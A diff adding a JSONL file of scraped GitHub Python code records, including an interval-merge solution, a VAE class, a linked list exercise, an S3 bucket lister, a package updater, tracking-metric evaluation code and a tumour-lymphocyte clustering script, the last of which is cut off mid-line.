diff --git "a/5418.jsonl" "b/5418.jsonl" new file mode 100644--- /dev/null +++ "b/5418.jsonl" @@ -0,0 +1,1416 @@ +{"seq_id":"2071524653","text":"\"\"\"\nGiven a set of non-overlapping intervals, insert a new interval into the intervals (merge if necessary).\nYou may assume that the intervals were initially sorted according to their start times.\n\nInput: intervals = [[1,3],[6,9]], newInterval = [2,5]\nOutput: [[1,5],[6,9]]\n\"\"\"\n\nclass Solution(object):\n def insert(self, intervals, newInterval):\n \"\"\"\n :type intervals: List[Interval]\n :type newInterval: Interval\n :rtype: List[Interval]\n \"\"\"\n \n s = newInterval.start\n e = newInterval.end\n \n left = [i for i in intervals if i.end < s]\n right = [i for i in intervals if i.start > e]\n \n #this \"if\" statement handles overlapping intervals\n if len(left) + len(right) != len(intervals):\n s = min(s, intervals[len(left)].start)\n e = max(e, intervals[~len(right)].end)\n \n return left + [Interval(s, e)] + right\n","repo_name":"mcfair/Algo","sub_path":"Interval/057. Insert Interval.py","file_name":"057. Insert Interval.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39752503901","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nclass VAE(nn.Module):\r\n def __init__(self, input_dim, latent_dim):\r\n super(VAE, self).__init__()\r\n self.encoder = nn.Sequential(\r\n nn.Linear(input_dim, 128),\r\n nn.ReLU(),\r\n nn.Linear(128, latent_dim)\r\n )\r\n self.decoder = nn.Sequential(\r\n nn.Linear(latent_dim, 128),\r\n nn.ReLU(),\r\n nn.Linear(128, input_dim),\r\n nn.Sigmoid()\r\n )\r\n\r\n def forward(self, x):\r\n z = self.encoder(x)\r\n return self.decoder(z), z\r\n\r\n\r\n","repo_name":"Alexandre-Caldeira/sia_DRL_2023","sub_path":"vae_class.py","file_name":"vae_class.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1019941789","text":"class Node:\n def __init__(self,data):\n self.data=data\n self.next=None\n\nclass LinkedList:\n def __init__(self):\n self.a=None\n \n def traverse(self):\n head=self.a\n temp=head\n while temp!=None:\n print(temp.data)\n temp=temp.next\n \n def addToEmpty(self, data):\n\t# Creating the newnode new\n new = Node(data)\n self.a = new\n \n def addBegin(self, data):\n temp = Node(data)\n temp.next = self.a.next\n self.a.next = temp\n return self.a\t\n \n def addEnd(self, data):\n temp = Node(data)\n print(self.a.data)\n temp.next = self.a.next\n self.a.next = temp\n self.a = temp\n # print(self.a.data)\n return self.a\n\n def addAfter(self, data, item):\n temp = Node(data)\n p = self.a.next\n while p:\n if (p.data == item):\n temp.next = p.next\n p.next = temp\n if (p == self.a):\n self.a = temp\n return self.a\n else:\n return self.a\n p = p.next\n if (p == self.a.next):\n print(item, \"not present in the list\")\n break\n \nll=LinkedList()\nll.addToEmpty(3)\nll.addBegin(5)\nll.addEnd(7)\nll.addAfter(9, 5)\nll.traverse()\n","repo_name":"nidhisha-shetty/DSA","sub_path":"LinkedList/circular_linkedlist/circular_llinkedlist_operations.py","file_name":"circular_llinkedlist_operations.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20331814875","text":"import boto3\nimport os\n#from boto3.s3.connection import S3Connection\n\n\n\n\ndef connectWithS3():\n # 
Create an S3 client\n #s3 = boto3.client('s3', aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],\n #aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'])\n #s3 = S3Connection(os.environ['AWS_ACCESS_KEY_ID'], os.environ['AWS_SECRET_ACCESS_KEY'])\n\n s3 = boto3.client('s3')\n\n # Call S3 to list current buckets\n response = s3.list_buckets()\n\n # Get a list of all bucket names from the response\n buckets = [bucket['Name'] for bucket in response['Buckets']]\n\n # Print out the bucket list\n print(\"Bucket List: %s\" % buckets)\n return \"Bucket List: %s\" % buckets;\n\n","repo_name":"xtheshumanator/ssc-rats","sub_path":"rats/AmazonS3/connectWithS3.py","file_name":"connectWithS3.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9296603657","text":"import json\nfrom json.decoder import JSONDecodeError\n\nimport requests\nfrom Classes.Metadata import Metadata\nfrom Classes.PortablePacket import PortablePacket\nfrom extension import write\nfrom colorama import Fore\nfrom zip_utils import *\nimport os\nimport sys\n\nhome = os.path.expanduser('~')\n\n\ndef update_portable(ctx, packet: PortablePacket, metadata: Metadata):\n import shutil\n import click\n from difflib import get_close_matches\n\n write(\n f'Updating [ {Fore.LIGHTCYAN_EX}{packet.display_name}{Fore.RESET} ]', 'white', metadata)\n\n options = os.listdir(rf'{home}\\electric')\n matches = get_close_matches(\n rf'{home}\\electric\\{packet.json_name}@{packet.latest_version}', options)\n if len(matches) == 1:\n # similar package exists and we need to get the version of the currently installed package.\n current_version = matches[0].split('@')[-1].replace('.json', '')\n\n if current_version != packet.latest_version:\n write(f'{packet.display_name} Will Be Updated From ({current_version}) => ({packet.latest_version})', 'green', metadata)\n write('Requesting Currently Installed Version', 'yellow', metadata)\n\n REQA = 'http://electric-package-manager-api.herokuapp.com/package/'\n\n try:\n response = requests.get(\n REQA + packet.json_name + '.json', timeout=5)\n except (requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout):\n click.echo(click.style(\n f'Failed to request {packet.json_name}.json from server', 'red'))\n sys.exit()\n\n try:\n res = json.loads(response.text)\n except JSONDecodeError:\n click.echo(click.style(f'{packet.json_name} not found!', 'red'))\n sys.exit()\n\n pkg = res\n\n pkg = pkg['portable']\n\n keys = list(pkg[current_version].keys())\n data = {\n 'display-name': res['display-name'],\n 'package-name': res['package-name'],\n 'latest-version': res['latest-version'],\n 'url': pkg[current_version]['url'],\n 'file-type': pkg[current_version]['file-type'] if 'file-type' in keys else None,\n 'extract-dir': res['package-name'],\n 'chdir': pkg[current_version]['chdir'] if 'chdir' in keys else [],\n 'bin': pkg[current_version]['bin'] if 'bin' in keys else [],\n 'shortcuts': pkg[current_version]['shortcuts'] if 'shortcuts' in keys else [],\n 'pre-install': pkg[current_version]['pre-install'] if 'pre-install' in keys else [],\n 'post-install': pkg[current_version]['post-install'] if 'post-install' in keys else [],\n 'install-notes': pkg[current_version]['install-notes'] if 'install-notes' in keys else None,\n 'uninstall-notes': pkg[current_version]['uninstall-notes'] if 'uninstall-notes' in keys else None,\n 'set-env': pkg[current_version]['set-env'] if 'set-env' in keys else None,\n 'persist': 
pkg[current_version]['persist'] if 'persist' in keys else None,\n 'checksum': pkg[current_version]['checksum'] if 'checksum' in keys else None,\n 'dependencies': pkg[current_version]['dependencies'] if 'dependencies' in keys else None,\n }\n\n old_packet = PortablePacket(data)\n\n # continue updating the package\n # if a directory has to be saved before uninstallation and installation of the portable\n\n if old_packet.persist:\n install_directory = rf'{home}\\electric\\{old_packet.json_name}@{current_version}\\\\'\n\n if old_packet.chdir:\n install_directory += old_packet.chdir + '\\\\'\n install_directory = install_directory.replace('\\\\\\\\', '\\\\')\n\n if isinstance(old_packet.persist, list):\n for path in old_packet.persist:\n # multiple directories to backup\n try:\n shutil.copytree(\n install_directory + path, rf'{home}\\electric\\Persist\\{old_packet.json_name}@{current_version}\\{path}')\n except FileExistsError:\n pass\n\n else:\n # only 1 directory to backup\n if old_packet.persist:\n try:\n shutil.copytree(install_directory + old_packet.persist,\n rf'{home}\\electric\\Persist\\{old_packet.json_name}@{current_version}\\{old_packet.persist}')\n except FileExistsError:\n pass\n\n os.system(f'electric uninstall {packet.json_name} --portable')\n os.system(f'electric install {packet.json_name} --portable')\n\n new_install_dir = rf'{home}\\electric\\{packet.json_name}@{packet.latest_version}\\\\'\n if packet.chdir:\n new_install_dir += packet.chdir + '\\\\'\n\n new_install_dir = new_install_dir.replace('\\\\\\\\', '\\\\')\n\n if old_packet.persist:\n write('Restoring Old Files And Data', 'green', metadata)\n\n if isinstance(old_packet.persist, list):\n for path in old_packet.persist:\n shutil.rmtree(new_install_dir + path)\n shutil.copytree(\n rf'{home}\\electric\\Persist\\{old_packet.json_name}@{current_version}\\{path}', new_install_dir + path)\n else:\n shutil.rmtree(new_install_dir.replace(\n '\\\\\\\\', '\\\\') + old_packet.persist.replace('\\\\\\\\', '\\\\'))\n shutil.copytree(\n rf'{home}\\electric\\Persist\\{old_packet.json_name}@{current_version}\\{old_packet.persist}', new_install_dir + old_packet.persist)\n\n # completed backup of files to backups directory\n write(\n rf'Successfully Completed Backup Of Required Data To {home}\\electric\\Persist', 'cyan', metadata)\n\n else:\n write(\n f'Could not find any existing installations of {packet.display_name}', 'red', metadata)\n\n write(f'Successfully Updated {packet.display_name}',\n 'bright_magenta', metadata)\n sys.exit()\n","repo_name":"dimensionhq/electric","sub_path":"src/zip_update.py","file_name":"zip_update.py","file_ext":"py","file_size_in_byte":6135,"program_lang":"python","lang":"en","doc_type":"code","stars":233,"dataset":"github-code","pt":"53"} +{"seq_id":"12194139805","text":"\nimport numpy as np\nfrom eval_code.Eval.eval_utils import squarify, linear_assignment_problem\n#from lapjv import lapjv as hungarian\nfrom scipy.optimize import linear_sum_assignment\n\ndef hungarian(costs):\n r, c = linear_sum_assignment(costs)\n return c, r, []\ndef eval_sequence(gt_data, tracker_data, similarity_scores, alpha_range, meta_data, metrics):\n\n # Init accumulators for sequence\n acc = {}\n\n if 'CLEAR' in metrics:\n acc = eval_CLEAR(acc, gt_data, tracker_data, similarity_scores, alpha_range, meta_data)\n\n if 'HOTA' in metrics or 'ID' in metrics:\n # Calculate gtID/prID alignement over all timesteps\n global_alignment = calc_global_alignment(gt_data, tracker_data, similarity_scores, alpha_range, meta_data)\n if 'HOTA' in 
metrics:\n acc = eval_HOTA(acc, gt_data, tracker_data, similarity_scores, global_alignment, alpha_range)\n if 'ID' in metrics:\n acc = eval_ID(acc, global_alignment, alpha_range, meta_data)\n\n return acc\n\ndef calc_global_alignment(gt_data, tracker_data, similarity_scores, alpha_range, meta_data):\n\n # Output dict with variables to save\n var_names = ['potential_matches_count','gt_id_count','pr_id_count']\n global_alignment = {k: [] for k in var_names}\n\n # Loop over all alpha thresholds\n for a_id, alpha in enumerate(alpha_range):\n\n potential_matches_count = np.zeros((meta_data['num_gtIDs'], meta_data['num_trackIDs']))\n gt_id_count = np.zeros((meta_data['num_gtIDs']))\n pr_id_count = np.zeros((meta_data['num_trackIDs']))\n\n # Loop over all timesteps,\n # count the number of potential matches for each gtID/prID combo,\n # and the total number of dets for each gtID and prID\n for t, (time_gt, time_data) in enumerate(zip(gt_data, tracker_data)):\n gt_ids = time_gt[1].astype(int)\n curr_ids = time_data[1].astype(int)\n\n gt_ids_mat = np.repeat(gt_ids[:, np.newaxis], len(curr_ids), axis=1)\n curr_ids_mat = np.repeat(curr_ids[np.newaxis, :], len(gt_ids), axis=0)\n matches_mask = np.greater(similarity_scores[t], alpha)\n potential_matches_count[gt_ids_mat[matches_mask],curr_ids_mat[matches_mask]] += 1\n\n gt_id_count[gt_ids] += 1\n pr_id_count[curr_ids] += 1\n\n global_alignment['potential_matches_count'].append(potential_matches_count)\n global_alignment['gt_id_count'].append(gt_id_count)\n global_alignment['pr_id_count'].append(pr_id_count)\n return global_alignment\n\ndef eval_HOTA(acc, gt_data, tracker_data, similarity_scores, global_alignment, alpha_range):\n\n # Add HOTA variables to accumulator\n acc_names = ['HOTA_TP','HOTA_FN','HOTA_FP','AssA','AssRe','AssPr','LocA']\n for name in acc_names:\n acc[name] = np.zeros((len(alpha_range)),dtype=np.float)\n\n # Loop over all alpha thresholds\n for a_id, alpha in enumerate(alpha_range):\n\n # Calculate the global alignment score (Jaccard Index) between each gtID/prID.\n potential_matches_count = global_alignment['potential_matches_count'][a_id]\n gt_id_count = global_alignment['gt_id_count'][a_id][:,np.newaxis]\n pr_id_count = global_alignment['pr_id_count'][a_id][np.newaxis,:]\n global_alignment_score = potential_matches_count / (gt_id_count + pr_id_count - potential_matches_count)\n\n matches_count = np.zeros_like(potential_matches_count)\n\n # Loop over each timestep\n for t, (time_gt, time_data) in enumerate(zip(gt_data, tracker_data)):\n similarity = squarify(similarity_scores[t], 0)\n gt_ids = time_gt[1].astype(int)\n pred_ids = time_data[1].astype(int)\n\n # Deal with the case that there are no gtDet/prDet in a timestep.\n if len(gt_ids)==0:\n acc['HOTA_FP'][a_id] += len(pred_ids)\n matches_count[-1, pred_ids] += 1\n continue\n if len(pred_ids)==0:\n acc['HOTA_FN'][a_id] += len(gt_ids)\n matches_count[gt_ids, -1] += 1\n continue\n\n # Get matching score pair of Dets for optimizing HOTA\n score_mat = global_alignment_score[gt_ids[:, np.newaxis],pred_ids[np.newaxis, :]]\n score_mat = squarify(score_mat, 0)\n score_mat = score_mat.astype(np.float) + 1.0e4 + 1.0e-4 * similarity\n score_mat[np.less(similarity, alpha)] = -1.0e4\n\n # Hungarian algorithm to find best matches\n match_rows, match_cols = linear_assignment_problem(score_mat)\n\n # Calculate and accumulate basic statistics\n num_matches = len(match_rows)\n acc['HOTA_TP'][a_id] += num_matches\n acc['HOTA_FN'][a_id] += len(gt_ids) - num_matches\n acc['HOTA_FP'][a_id] += 
len(pred_ids) - num_matches\n acc['LocA'][a_id] += sum(similarity[match_rows, match_cols])\n matches_count[gt_ids[match_rows], pred_ids[match_cols]] += 1\n\n # Calculate association scores for sequence.\n acc['AssA'][a_id] = np.sum(matches_count * matches_count / (gt_id_count + pr_id_count - matches_count)) / np.maximum(1.0, acc['HOTA_TP'][a_id])\n acc['AssRe'][a_id] = np.sum(matches_count * matches_count / np.maximum(1.0, gt_id_count)) / np.maximum(1.0, acc['HOTA_TP'][a_id])\n acc['AssPr'][a_id] = np.sum(matches_count * matches_count / np.maximum(1.0, pr_id_count)) / np.maximum(1.0, acc['HOTA_TP'][a_id])\n\n # Calculate final scores\n acc['LocA'] = acc['LocA'] / np.maximum(1.0, acc['HOTA_TP'])\n acc['DetRe'] = acc['HOTA_TP'] / (acc['HOTA_TP'] + acc['HOTA_FN'])\n acc['DetPr'] = acc['HOTA_TP'] / (acc['HOTA_TP'] + acc['HOTA_FP'])\n acc['DetA'] = acc['HOTA_TP'] / (acc['HOTA_TP'] + acc['HOTA_FN'] + acc['HOTA_FP'])\n acc['HOTA'] = np.sqrt(acc['DetA'] * acc['AssA'])\n return acc\n\ndef eval_CLEAR(acc, gt_data, tracker_data, similarity_scores, alpha_range, meta_data):\n num_gt_ids = meta_data['num_gtIDs']\n\n # Add CLEAR variables to accumulator\n acc_names = ['CLR_TP','CLR_FN','CLR_FP','IDSW','MOTP','MT','PT','ML','Frag']\n for name in acc_names:\n acc[name] = np.zeros((len(alpha_range)), dtype=np.float)\n\n # Loop over all alpha thresholds\n for a_id, alpha in enumerate(alpha_range):\n gt_id_count = np.zeros((num_gt_ids)) # For MT/ML/PT\n gt_matched_count = np.zeros((num_gt_ids)) # For MT/ML/PT\n gt_frag_count = np.zeros((num_gt_ids)) # For counting Frag\n PrevPrID = np.NaN*np.zeros((num_gt_ids)) # For scoring IDS (previous prID for each gt over all prev timesteps)\n PrevPrID_only_prev = np.NaN * np.zeros((num_gt_ids)) # For matching IDS (previous prID for each gt over only last timestep)\n\n # Loop over timesteps\n for t, (time_gt, time_data) in enumerate(zip(gt_data, tracker_data)):\n similarity = squarify(similarity_scores[t], 0)\n gt_ids = time_gt[1].astype(int)\n pred_ids = time_data[1].astype(int)\n\n # Deal with the case that there are no gtDet/prDet in a timestep.\n if len(gt_ids)==0:\n acc['CLR_FP'][a_id] += len(pred_ids)\n continue\n if len(pred_ids)==0:\n acc['CLR_FN'][a_id] += len(gt_ids)\n continue\n\n # Calc score matrix to first minimise IDSWs from previous frame, and then maximise MOTP secondarily\n score_mat = (pred_ids[np.newaxis, :] == PrevPrID_only_prev[gt_ids[:, np.newaxis]])\n score_mat = squarify(score_mat, 0)\n score_mat = 1000*score_mat + similarity\n score_mat[similarity < alpha] = -1\n\n # Hungarian algorithm\n match_rows, match_cols = linear_assignment_problem(score_mat)\n matched_gt_ids = gt_ids[match_rows]\n matched_pred_ids = pred_ids[match_cols]\n\n # Calc IDSW for MOTA\n prev_matched_pred_ids = PrevPrID[matched_gt_ids]\n is_IDSW = (np.logical_not(np.isnan(prev_matched_pred_ids))) & (np.not_equal(matched_pred_ids, prev_matched_pred_ids))\n acc['IDSW'][a_id] += np.sum(is_IDSW)\n\n # Update counters for MT/ML/PT/Frag and record for IDS/Frag for next timestep\n gt_id_count[gt_ids] += 1\n gt_matched_count[matched_gt_ids] += 1\n not_previously_tracked = np.isnan(PrevPrID_only_prev)\n PrevPrID[matched_gt_ids] = matched_pred_ids\n PrevPrID_only_prev[:] = np.nan\n PrevPrID_only_prev[matched_gt_ids] = matched_pred_ids\n currently_tracked = np.logical_not(np.isnan(PrevPrID_only_prev))\n gt_frag_count += np.logical_and(not_previously_tracked, currently_tracked)\n\n # Calculate and accumulate basic statistics\n num_matches = len(matched_gt_ids)\n acc['CLR_TP'][a_id] += 
num_matches\n acc['CLR_FN'][a_id] += len(time_gt[0]) - num_matches\n acc['CLR_FP'][a_id] += len(time_data[0]) - num_matches\n acc['MOTP'][a_id] += sum(similarity[match_rows, match_cols])\n\n # Calculate MT/ML/PT/Frag\n tracked_ratio = gt_matched_count[gt_id_count>0]/gt_id_count[gt_id_count>0]\n acc['MT'][a_id] = np.sum(np.greater(tracked_ratio,0.8))\n acc['ML'][a_id] = np.sum(np.less(tracked_ratio, 0.2))\n acc['PT'][a_id] = sum(gt_id_count>0) - acc['MT'][a_id] - acc['ML'][a_id]\n acc['Frag'][a_id] = np.sum(np.subtract(gt_frag_count[gt_frag_count>0],1))\n\n # Calc final metrics\n acc['MODA'] = (acc['CLR_TP'] - acc['CLR_FP']) / (acc['CLR_TP'] + acc['CLR_FN'])\n acc['MOTA'] = (acc['CLR_TP'] - acc['CLR_FP'] - acc['IDSW']) / (acc['CLR_TP'] + acc['CLR_FN'])\n acc['Recall'] = (acc['CLR_TP']) / (acc['CLR_TP'] + acc['CLR_FN'])\n acc['Precision'] = (acc['CLR_TP']) / (acc['CLR_TP'] + acc['CLR_FP'])\n acc['MOTP'] = acc['MOTP'] / np.maximum(1.0, acc['CLR_TP'])\n return acc\n\ndef eval_ID(acc, global_alignment, alpha_range, meta_data):\n num_gt_ids = meta_data['num_gtIDs']\n num_tracker_ids = meta_data['num_trackIDs']\n\n # Add ID variables to accumulator\n acc_names = ['IDTP', 'IDFP', 'IDFN']\n for name in acc_names:\n acc[name] = np.zeros((len(alpha_range)), dtype=np.float)\n\n # Loop over alpha thresholds\n for a_id, alpha in enumerate(alpha_range):\n potential_matches_count = global_alignment['potential_matches_count'][a_id]\n gt_id_count = global_alignment['gt_id_count'][a_id]\n pr_id_count = global_alignment['pr_id_count'][a_id]\n\n # Calculate optimal assignment cost matrix for ID\n FPmat = np.zeros((num_gt_ids + num_tracker_ids, num_gt_ids + num_tracker_ids))\n FNmat = np.zeros((num_gt_ids + num_tracker_ids, num_gt_ids + num_tracker_ids))\n FPmat[num_gt_ids:, :num_tracker_ids] = 1e10\n FNmat[:num_gt_ids, num_tracker_ids:] = 1e10\n for gt_id in range(num_gt_ids):\n FNmat[gt_id, :num_tracker_ids] = gt_id_count[gt_id]\n FNmat[gt_id, num_tracker_ids + gt_id] = gt_id_count[gt_id]\n for pr_id in range(num_tracker_ids):\n FPmat[:num_gt_ids, pr_id] = pr_id_count[pr_id]\n FPmat[pr_id + num_gt_ids, pr_id] = pr_id_count[pr_id]\n FPmat[:num_gt_ids, :num_tracker_ids] -= potential_matches_count\n FNmat[:num_gt_ids, :num_tracker_ids] -= potential_matches_count\n\n # Hungarian algorithm\n match_cols, _, _ = hungarian(FPmat + FNmat)\n match_rows = np.arange(len(match_cols))\n\n # Accumulate basic statistics\n acc['IDFP'][a_id] = FPmat[match_rows, match_cols].sum().astype(np.int)\n acc['IDFN'][a_id] = FNmat[match_rows, match_cols].sum().astype(np.int)\n acc['IDTP'][a_id] = (gt_id_count.sum() - acc['IDFN'][a_id]).astype(np.int)\n\n # Calculate final ID scores\n acc['IDP'] = acc['IDTP'] / (acc['IDTP'] + acc['IDFP'])\n acc['IDR'] = acc['IDTP'] / (acc['IDTP'] + acc['IDFN'])\n acc['IDF1'] = acc['IDTP'] / (acc['IDTP'] + 0.5 * acc['IDFN'] + 0.5 * acc['IDFP'])\n return acc\n\n","repo_name":"TimoK93/ApLift","sub_path":"third_party_code/HOTA-metrics_cloned/eval_code/Eval/eval_sequence.py","file_name":"eval_sequence.py","file_ext":"py","file_size_in_byte":11983,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"7122911456","text":"import os\nimport argparse\nimport shapely\nimport json\nimport time\nimport joblib\nimport numpy as np\n\nfrom tqdm.auto import tqdm\nfrom functools import partial\n\nfrom sklearn.neighbors import KDTree\n\nfrom multiprocessing.pool import ThreadPool\n\nfrom lib.biomarker.utils import (\n load_data,\n convert_time,\n get_logger,\n 
check_processed,\n make_dir_result,\n)\nfrom lib.biomarker.digital_tils import (\n get_cluster_region,\n get_radius,\n check_contain,\n clean_feature,\n clustering_spatial,\n get_centroid_contour,\n get_poly_contour,\n check_poly_valid,\n)\n\n\ndef main(\n fpath,\n concave,\n use_hovernet,\n n_worker,\n outer_buffer,\n tum_distance,\n tum_samples,\n logger,\n nuclei_type_1=1, # nuclei to be clustered/tumour\n nuclei_type_2=2, # nuclei to counted/lymphocyte\n):\n first_start = time.time()\n\n fname = fpath.split(\"/\")[-1].split(\".\")[0]\n logger.info(\n f\"distance: {tum_distance} samples: {tum_samples} buffer: {outer_buffer}\"\n )\n logger.info(f\"Processing {fname}\")\n\n #################################################################\n\n start = time.time()\n\n logger.info(\"Opening data...\")\n nuclei_data = load_data(fpath)\n\n logger.info(f\"Data loaded in :{convert_time(time.time() - start)}\")\n\n #################################################################\n\n logger.info(\" preparing data...\")\n if use_hovernet:\n # 1 is tumour\n # 2 is lymphocyte\n key_tum, key_lym, centroids_tum, centroids_lym = get_centroid_contour(\n nuclei_data=nuclei_data, tumour_label=nuclei_type_1, lym_label=nuclei_type_2\n )\n else:\n key_tum, key_lym, centroids_tum, centroids_lym = get_centroid_contour(\n nuclei_data=nuclei_data\n )\n kdtree_lym = KDTree(centroids_lym)\n kdtree_tum = KDTree(centroids_tum)\n\n #################################################################\n\n logger.info(\" clustering...\")\n clusters_centroids = clustering_spatial(\n centroids=centroids_tum,\n key_tum=key_tum,\n nuclei_data=nuclei_data,\n distance=tum_distance,\n min_sample=tum_samples,\n )\n\n #################################################################\n\n result_dict = {\n \"num_tumour_cells\": len(centroids_tum),\n \"num_lymphocyte_cells\": len(centroids_lym),\n \"tumour_cluster\": {},\n }\n\n #################################################################\n\n logger.info(f\" starting get cluster region...\")\n start = time.time()\n part_cluster_region = partial(get_cluster_region, concave)\n with ThreadPool(processes=n_worker) as p:\n cluster_polygons = p.map(part_cluster_region, clusters_centroids)\n\n if concave:\n cluster_concaves = []\n for poly in cluster_polygons:\n if type(poly) == shapely.geometry.multipolygon.MultiPolygon:\n # multi_poly = list(poly.geoms)\n for poly2 in poly.geoms:\n if check_poly_valid(poly2, outer_buffer):\n cluster_concaves.append(poly2)\n else:\n if check_poly_valid(poly, outer_buffer):\n cluster_concaves.append(poly)\n else:\n cluster_concaves = cluster_polygons\n\n dct_visual = {}\n for i, pol in enumerate(cluster_concaves):\n dct_visual[i] = {\n \"inner_contours\": np.around(np.array(pol.exterior.coords.xy), 4).T.tolist(),\n \"outer_contours\": None,\n \"inner_TIL_contour\": None,\n \"outer_TIL_contour\": None,\n \"inner_tum_contour\": None,\n \"outer_tum_contour\": None,\n }\n # logger.info(f\" found {len(cluster_concaves)} concave objects\")\n logger.info(f\" finished get cluster region: {convert_time(time.time() - start)}s\")\n #################################################################\n\n logger.info(\" starting biomarker calculation..\")\n start = time.time()\n for ix, cluster_tum_hull in enumerate(\n tqdm(cluster_concaves, bar_format=\"{l_bar}{bar:10}{r_bar}{bar:-10b}\")\n ):\n #################################################################\n\n outer_cluster_tum_hull_ = cluster_tum_hull.buffer(outer_buffer) # expanded area\n outer_cluster_tum_hull 
= (\n outer_cluster_tum_hull_ - cluster_tum_hull\n ) # expanded area - original area\n part_check = partial(check_contain, cluster_tum_hull, outer_cluster_tum_hull)\n\n #################################################################\n\n # if (len(outer_cluster_tum_hull.bounds) == 4) and (not outer_cluster_tum_hull.is_empty):\n c_x, c_y, radius = get_radius(outer_cluster_tum_hull_)\n outer_contours = get_poly_contour(outer_cluster_tum_hull_)\n #################################################################\n\n list_nearest_lymphocyte = kdtree_lym.query_radius([[c_x, c_y]], r=radius)\n nearest_lym = list_nearest_lymphocyte[0].tolist()\n\n nearest_lym_centroid = []\n nearest_lym_contour = []\n for x in key_lym[nearest_lym]:\n nearest_lym_centroid.append(nuclei_data[x][\"centroid\"])\n nearest_lym_contour.append(nuclei_data[x][\"contour\"])\n\n #################################################################\n\n list_nearest_tumour = kdtree_tum.query_radius([[c_x, c_y]], r=radius)\n nearest_tum = list_nearest_tumour[0].tolist()\n\n nearest_tum_centroid = []\n nearest_tum_contour = []\n for x in key_tum[nearest_tum]:\n nearest_tum_centroid.append(nuclei_data[x][\"centroid\"])\n nearest_tum_contour.append(nuclei_data[x][\"contour\"])\n\n #################################################################\n\n with ThreadPool(processes=n_worker) as p:\n temp_til = p.starmap(\n part_check, zip(nearest_lym_centroid, nearest_lym_contour)\n )\n\n with ThreadPool(processes=n_worker) as p:\n temp_tum = p.starmap(\n part_check, zip(nearest_tum_centroid, nearest_tum_contour)\n )\n\n #################################################################\n\n (\n inner_count,\n outer_count,\n stat_inner_features,\n stat_outer_features,\n inner_TIL_contour,\n outer_TIL_contour,\n ) = clean_feature(temp_til)\n (\n inner_countTum,\n outer_countTum,\n stat_inner_featuresTum,\n stat_outer_featuresTum,\n inner_tum_contour,\n outer_tum_contour,\n ) = clean_feature(temp_tum)\n result_dict[\"tumour_cluster\"][ix] = {\n \"inner_tumour_area\": cluster_tum_hull.area,\n \"outer_tumour_area\": outer_cluster_tum_hull.area,\n \"num_inner_til\": inner_count,\n \"num_outer_til\": outer_count,\n \"feature_inner_til\": stat_inner_features,\n \"feature_outer_til\": stat_outer_features,\n \"num_inner_tum\": inner_countTum,\n \"num_outer_tum\": outer_countTum,\n \"feature_inner_tum\": stat_inner_featuresTum,\n \"feature_outer_tum\": stat_outer_featuresTum,\n }\n\n dct_visual[ix][\"outer_contours\"] = outer_contours\n dct_visual[ix][\"inner_TIL_contour\"] = inner_TIL_contour\n dct_visual[ix][\"outer_TIL_contour\"] = outer_TIL_contour\n dct_visual[ix][\"inner_tum_contour\"] = inner_tum_contour\n dct_visual[ix][\"outer_tum_contour\"] = outer_tum_contour\n\n #################################################################\n\n #################################################################\n logger.info(f\" finished calculating: {convert_time(time.time() - start)}s\")\n logger.info(f\"{fname} is finished in :{convert_time(time.time() - first_start)}\")\n logger.info(f\"\\n\\n\")\n\n return result_dict, dct_visual\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"-i\", \"--input_dir\", help=\"Directory to nuclei annotation from HoverNet\"\n )\n parser.add_argument(\"-o\", \"--output_dir\", help=\"Directory to save the results\")\n parser.add_argument(\n \"-cc\",\n \"--use_concave\",\n action=\"store_true\",\n help=\"Create concave cluster or not. 
If false, cluster is convex (faster)\",\n )\n parser.add_argument(\n \"-nd\",\n \"--nuclei_dist\",\n default=100,\n help=\"Minimum distance between nuclei, clustering hyperparameter.\",\n )\n parser.add_argument(\n \"-nn\",\n \"--num_nuclei\",\n default=10,\n help=\"Minimum number of nuclei in cluster, clustering hyperparameter.\",\n )\n parser.add_argument(\n \"-ob\", \"--outer_buffer\", default=60, help=\"Size of the enlarged cluster area\"\n )\n parser.add_argument(\n \"-nw\", \"--num_worker\", default=4, help=\"CPU count for multiprocessing\"\n )\n parser.add_argument(\n \"-hv\",\n \"--use_hovernet\",\n action=\"store_true\",\n help=\"Whether use json from HoverNet or not\",\n )\n\n args = parser.parse_args()\n\n nuclei_dir = args.input_dir\n outdir = args.output_dir\n nuclei_dist = int(args.nuclei_dist)\n num_nuclei = int(args.num_nuclei)\n outer_buffer = int(args.outer_buffer)\n n_worker = int(args.num_worker)\n use_hovernet = args.use_hovernet\n use_concave = args.use_concave\n\n rootdir, fdir, vdir = make_dir_result(\n use_concave, outdir, outer_buffer, nuclei_dist, num_nuclei\n )\n log_file = f\"{rootdir}/tum_dist[{nuclei_dist}]-tum_smpl[{num_nuclei}]_buffer[{outer_buffer}].log\"\n logger = get_logger(logger_name=\"my_log\", log_file=log_file)\n\n file_list, total_len, total_done = check_processed(nuclei_dir, fdir)\n file_list = sorted(file_list, key=os.path.getsize)\n\n for i, fpath in enumerate(file_list):\n print(f\"COUNTER: {i+1+total_done}/{total_len}\")\n fname = fpath.split(\"/\")[-1].split(\".\")[0]\n result, dct_visual = main(\n fpath=fpath,\n concave=True,\n use_hovernet=use_hovernet,\n n_worker=n_worker,\n outer_buffer=outer_buffer,\n tum_distance=nuclei_dist,\n tum_samples=num_nuclei,\n logger=logger,\n )\n out_featureF = f\"{fdir}/{fname}.json\"\n with open(out_featureF, \"w\") as f:\n json.dump(result, f, indent=6)\n\n out_visualF = f\"{vdir}/{fname}.dat\"\n with open(out_visualF, \"wb\") as f:\n joblib.dump(dct_visual, f)\n\n print(\"ALL FILE HAVE BEEN 